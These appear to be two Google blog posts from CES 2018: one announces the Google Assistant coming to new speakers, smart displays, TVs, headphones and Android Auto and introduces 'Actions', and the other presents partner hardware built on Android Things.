To help you discover the Actions available on the Assistant, we have a new directory page. You can also explore them with your Assistant on your Android phone or iPhone —just go to your Assistant, select the blue icon in the corner and dive in. And we bet you’ll find a few gems you never knew the Assistant could do. And the best part? We're always adding more Actions.

Actions

That’s our news for the day. We’re just a few days into the new year and continuing to make the Assistant more helpful and more available, no matter what device you’re using. We can’t wait to see what you do with the Assistant this year.

New devices and more: what’s in store for the Google Assistant this year

The Google Assistant is your personal Google. It lets you have a conversation and ask about everything under the sun and, best of all, it’s available wherever you need help—at home or on the go. Over the past year, we've been working to bring the Assistant to more devices in more places and now it's available on more than 400 million devices.

Tuesday marks the start of the Consumer Electronics Show in Las Vegas, NV, and we'll be there to showcase some of the exciting stuff we have in store for 2018. So if you’re at CES, stop on by the Google Assistant Playground (Central Plaza-21). Here we go!

At home

The Google Assistant gives you an easy, hands-free way to control your home, whether it’s helping you dim the lights from the comfort of your couch or play your dinner party playlist. It's already lending a helping hand in speakers like Google Home, Mini and Max. In fact, we’ve sold more than one Google Home every second since Google Home Mini started shipping in October. And with so much excitement around speakers, we’re making the Assistant even more available—this week we’re announcing that the Assistant is coming to new voice-activated speakers from Altec Lansing, Anker Innovations, Bang & Olufsen, Braven, iHome, JBL, Jensen, LG, Klipsch, Knit Audio, Memorex, RIVA Audio and SōLIS.

But there are also moments when a screen would make the Assistant even more helpful, like when you need to learn how to cut a pineapple, and the best way is to watch a video. Today, we're announcing that the Assistant is coming to smart displays. These new devices have the Google Assistant built in, and with the added benefit of a touch screen, they can help you get even more done. You can watch videos from YouTube, video call with Google Duo, find photos from Google Photos and more. You can also get recommendations for your favorite content, right on the home screen.

Starting later this year, the Assistant is coming to new smart displays from four companies, including JBL, Lenovo, LG and Sony. To learn more about how smart displays were built, visit the Android Developers blog.

Assistant on smart display

Last year we brought the Assistant to Android TV devices including NVIDIA's SHIELD TV and Sony’s Android TVs, so you can find the latest blockbuster, stock up on snacks with Google Express and set the perfect movie watching mood lighting. We will continue to roll out the Assistant to existing Android TVs such as AirTV Player, Bouygues Telecom, LG U+, TCL, Skyworth and Xiaomi. And, this week, Changhong, Element, Funai, Haier, Hisense and Westinghouse are announcing new Android TVs with the Google Assistant. Plus, we've worked closely with LG to integrate the Assistant into the new line of LG TVs in the coming months.

And, across all your devices, the Google Assistant is making your home even smarter. The Assistant now works with over 225 home control brands and more than 1,500 devices, including a bunch of new ones from Abode, Crestron, Gourmia, Insteon, Kohler and Yonomi. With these integrations, millions of new smart home devices are being connected to the Assistant every month, so you can stay in control, whether you want to heat up the house, check on the laundry or make sure you locked the back door.

On your phone and headphones

The Google Assistant is available on your Android phone, iPhone, and headphones, helping you when you're on the go. And this week we're announcing that over the coming year, more headphones are on the way from Jaybird, JBL, LG and Sony. These headphones are optimized for the Google Assistant; once you pair them to your phone, you can talk to the Assistant instantly with just the touch of an earbud, whether you want to skip a track to hear the next song, get notifications, or hear and respond to your messages.

In your car

The Assistant can also help you in the car, so that you can keep your hands on the wheel and eyes on the road. Starting this week in the U.S., the Assistant is coming to Android Auto.

Android Auto is available in tens of millions of cars on more than 400 models from 40+ brands, including Ford, General Motors, Nissan, Volkswagen and Volvo. With the Assistant in Android Auto, you can listen to your playlists from apps like Spotify or Google Play Music, get quick directions from Google Maps or Waze, and send or receive messages from services like WhatsApp. And soon, you’ll be able to reserve a parking space with SpotHero or order your favorite handcrafted drink or food from Starbucks—all from the road.

Assistant on Android auto

You can use the Assistant in Android Auto on your car display by connecting your Android phone to a supported car—or you can use it on your phone screen in any car. And we're working with auto makers to integrate the Assistant directly into their cars—no phone required.

With the Assistant on your phone, speaker or TV, you can also check your fuel level, lock doors, and more. This feature is already available on cars from BMW, Mercedes-Benz and Hyundai—and today we're announcing that it'll be coming to cars from Kia and Fiat Chrysler Automobiles.

Always ready to help

Since the Assistant can do so many things, we're introducing a new way to talk about them. We’re calling them Actions. Actions include features built by Google—like directions on Google Maps—and those that come from developers, publishers and other third parties, like working out with Fitbit Coach. So finding photos with Google Photos would be one Action while meditating with Headspace would be another. All in all, today there are more than a million Actions you can take with your Assistant.

To help you discover the Actions available on the Assistant, we have a new directory page. You can also explore them with your Assistant on your Android phone or iPhone —just go to your Assistant, select the blue icon in the corner and dive in. And we bet you’ll find a few gems you never knew the Assistant could do. And the best part? We're always adding more Actions.

Actions

That’s our news for the day. We’re just a few days into the new year and continuing to make the Assistant more helpful and more available, no matter what device you’re using. We can’t wait to see what you do with the Assistant this year.

Source: Android


New Products At CES powered by Android Things

By Venkat Rapaka, Director of Product Management, Google

The Android Things team has been working closely with our partners to create compelling, secure and thoughtful IoT products. During the Consumer Electronics Show (CES) in Las Vegas, a number of our OEM partners are announcing their first set of products powered by Android Things. These products are built on certified Android Things System-on-Modules (SoMs) from our silicon partners, benefit from regular feature and security updates from Google, and have the Google Assistant and Google Cast seamlessly built in.

New voice-activated speakers powered by Android Things are being announced at CES, including the LG ThinQ WK7 and iHome iGV1. Turnkey hardware solutions based on the Qualcomm SD212 Home Hub Platform, MediaTek MT8516 and Rockchip RK3229 SoM are certified for the Assistant and Cast, and NXP i.MX 8M is coming soon. Three of our Original Design Manufacturer (ODM) partners, Tymphany, Goertek, and Tonly, have created full speaker reference designs based on these SoMs to further reduce development cost and time-to-market.

Today, we also announced that the Google Assistant is coming to smart displays powered by Android Things. These new devices have the Assistant and Cast built in, and with the added benefit of a touch screen, they can help you see and do more. Smart displays from JBL, Lenovo, LG (all based on the Qualcomm SD624 Home Hub Platform) and Sony (based on the MediaTek MT8173 SoM) will be available later this year.

Of course, Android Things is designed to support a wide variety of devices beyond speakers and smart displays. Prototype demos can be found in the NXP booth, such as HandBot, DrawBot, 3D printer, and AI artwork T-shirts.

Starting tomorrow, you can visit the Google Assistant Playground (booth CP-21) at CES to view new products, chipsets, and reference designs by our partners. In addition, these devices are also available for display in other company spaces throughout the conference, including Lenovo, LG, JBL, Qualcomm, MediaTek, NXP, Rockchip, iHome, Goertek, and Tymphany.

Android Things is currently in Developer Preview, and you can get started with the latest version DP6.1. You can use the Android Things Console to download system images and flash existing devices. Feedback can be given by filing bug reports and feature requests, as well as on Stack Overflow or our Google's IoT Developers Community. The Long Term Support release will be available this year, with more details coming soon.